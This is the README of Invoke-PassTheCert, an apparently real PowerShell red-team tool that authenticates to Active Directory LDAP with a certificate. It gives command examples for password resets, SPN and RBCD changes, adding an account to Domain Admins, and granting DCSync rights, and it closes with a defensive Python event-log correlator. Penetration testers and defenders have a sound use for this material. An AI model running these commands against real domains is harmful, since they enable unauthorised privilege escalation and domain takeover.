Invoke-PassTheCert is a pure PowerShell port of PassTheCert. The purpose of this repository is to expand the landscape of PowerShell tooling available to penetration testers and red teamers.
The original work by AlmondOffsec can be found here: https://github.com/AlmondOffSec/PassTheCert along with the accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
Sometimes, Domain Controllers do not support PKINIT. This can be because their certificates do not have the Smart Card Logon EKU. However, several protocols, including LDAP, support Schannel and therefore allow authentication through TLS with a client certificate.
If the certificate is password protected, you will need to provide the -CertificatePassword parameter.
The -Certificate parameter accepts either a path to a PFX file or a Base64 encoded certificate (MIINA...).
Invoke-PassTheCert -Server "dc01.domain.com" -Certificate "cert.pfx" -Whoami
Display the current identity authenticated via the certificate.
Invoke-PassTheCert -Server "dc01.domain.com" -Certificate "cert.pfx" -Whoami
Reset a target user's password to a random value.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -ResetPassword "CN=John Doe,CN=Users,DC=domain,DC=com"
Adds an SPN (e.g., cifs/fake.domain.com) to a user object.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddSPN "CN=svc_user,CN=Users,DC=domain,DC=com"
Removes SPN from target.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveSPN "CN=svc_user,CN=Users,DC=domain,DC=com"
Adds a user or computer to a specified group.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddToGroup "CN=John Doe,CN=Users,DC=domain,DC=com" -GroupDN "CN=Domain Admins,CN=Users,DC=domain,DC=com"
Removes a user or computer from a group.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveFromGroup "CN=John Doe,CN=Users,DC=domain,DC=com" -GroupDN "CN=Domain Admins,CN=Users,DC=domain,DC=com"
Enables or disables a user/computer account.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -ToggleAccountStatus "CN=svc_user,CN=Users,DC=domain,DC=com"
Adds a new computer account to the domain. A random password will be generated if -ComputerPassword is omitted.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddComputer "NewPC01" -ComputerPassword "Summer2025!"
Removes a computer object from the domain.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveComputer "CN=NewPC01,CN=Computers,DC=domain,DC=com"
Grants RBCD rights to a specified user/computer by SID.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -AddRBCD "CN=TargetPC,CN=Computers,DC=domain,DC=com" -SID "S-1-5-21-..."
Removes RBCD rights from a target object.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -RemoveRBCD "CN=TargetPC,CN=Computers,DC=domain,DC=com"
Grants a user rights to perform DCSync by modifying the domain security descriptor.
Invoke-PassTheCert -Server "dc01" -Certificate "cert.pfx" -Elevate "CN=svc_user,CN=Users,DC=domain,DC=com"
- Support for Start TLS
- Shadow Credential Attacks
- LDAP interactive Shell
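
For defenders: each operation listed above leaves an account-management or directory-change event on the Domain Controller. The following is an added example, not part of this repository, that correlates certificate (Schannel) logons with those changes over constructed event records; the field names follow the Windows Security log, and the `Schannel` logon process value is an assumption to validate against your own DC logs.

```python
from datetime import datetime, timedelta

# 5136 (directory object modified): attributes the listed operations write, lower-cased.
SENSITIVE_ATTRS = {
    "serviceprincipalname": "SPN change",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD change",
    "ntsecuritydescriptor": "security descriptor change",
    "useraccountcontrol": "account status change",
}
# Account-management event IDs produced by the other operations.
ACCOUNT_EVENTS = {4724: "password reset", 4728: "group member added",
                  4729: "group member removed", 4741: "computer account created",
                  4743: "computer account deleted"}

def find_schannel_changes(events, window=timedelta(minutes=30)):
    """Return (account, change, target) for changes made in Schannel logon sessions."""
    sessions, findings = {}, []  # sessions: logon id -> (account, logon time)
    for ev in sorted(events, key=lambda e: e["time"]):
        if ev["id"] == 4624:
            # Assumption: certificate (Schannel) logons report this logon process name.
            if ev.get("LogonProcessName", "").strip().lower() == "schannel":
                sessions[ev["TargetLogonId"]] = (ev["TargetUserName"], ev["time"])
            continue
        session = sessions.get(ev.get("SubjectLogonId"))
        if session is None or ev["time"] - session[1] > window:
            continue  # not a Schannel session, or too long after the logon
        if ev["id"] == 5136:
            label = SENSITIVE_ATTRS.get(ev.get("AttributeLDAPDisplayName", "").lower())
            target = ev.get("ObjectDN")
        else:
            label, target = ACCOUNT_EVENTS.get(ev["id"]), ev.get("TargetUserName")
        if label:
            findings.append((session[0], label, target))
    return findings

T0 = datetime(2025, 1, 1, 12, 0)
SAMPLE_EVENTS = [  # constructed records, not real logs
    {"id": 4624, "time": T0, "LogonProcessName": "Schannel",
     "TargetUserName": "svc_user", "TargetLogonId": "0x1a2b"},
    {"id": 4624, "time": T0, "LogonProcessName": "Kerberos",
     "TargetUserName": "admin1", "TargetLogonId": "0x9f00"},
    {"id": 5136, "time": T0 + timedelta(minutes=1), "SubjectLogonId": "0x1a2b",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "ObjectDN": "CN=TargetPC,CN=Computers,DC=domain,DC=com"},
    {"id": 4728, "time": T0 + timedelta(minutes=2), "SubjectLogonId": "0x1a2b",
     "TargetUserName": "Domain Admins"},
    {"id": 5136, "time": T0 + timedelta(minutes=3), "SubjectLogonId": "0x9f00",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "ObjectDN": "CN=svc_user,CN=Users,DC=domain,DC=com"},
]
```

Event 5136 is only logged when the Audit Directory Service Changes policy is enabled and the modified object carries a matching SACL, so confirm both before relying on this correlation.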